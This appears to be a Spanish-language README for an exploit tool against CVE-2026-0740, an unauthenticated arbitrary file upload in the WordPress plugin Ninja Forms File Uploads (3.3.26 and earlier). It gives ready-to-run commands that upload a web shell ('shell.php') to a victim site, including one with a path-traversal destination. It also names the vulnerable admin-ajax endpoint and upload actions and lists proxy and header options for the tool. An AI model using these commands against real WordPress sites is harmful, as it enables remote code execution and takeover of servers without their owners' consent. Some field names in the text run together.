
Ninja Forms File Uploads <= 3.3.26 - Subida arbitraria de archivos no autenticada
CVE-2026-0740 es una vulnerabilidad de subida arbitraria de archivos sin autenticación que afecta a:
Ninja Forms File Uploads ≤ 3.3.26 (plugin de WordPress)
Esta falla permite a los atacantes subir archivos arbitrarios al servidor sin autenticación, lo que potencialmente conduce a la ejecución remota de código (RCE).
Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Instalar dependencias:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.phpPlugin: Ninja Forms File Uploads
Endpoint: /wp-admin/admin-ajax.php
Acciones:
nf_fu_get_new_noncenf_fu_upload/wp-content/uploads/Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.
Las pull requests son bienvenidas. Para cambios importantes, abre primero un issue para discutir lo que te gustaría cambiar.
| Argumento | Descripción |
|---|
-t, --target | URL del objetivo |
-f, --file | Archivo a subir |
-d, --dest | Ruta de destino (path traversal) |
-x, --proxy | Proxy SOCKS5 |
-H, --headers | Cabeceras personalizadas |
--timeout | Tiempo de espera de la solicitud |
--no-color | Deshabilitar salida con colores |
-q, --quiet | Modo silencioso |
--verify-ssl | Habilitar verificación SSL |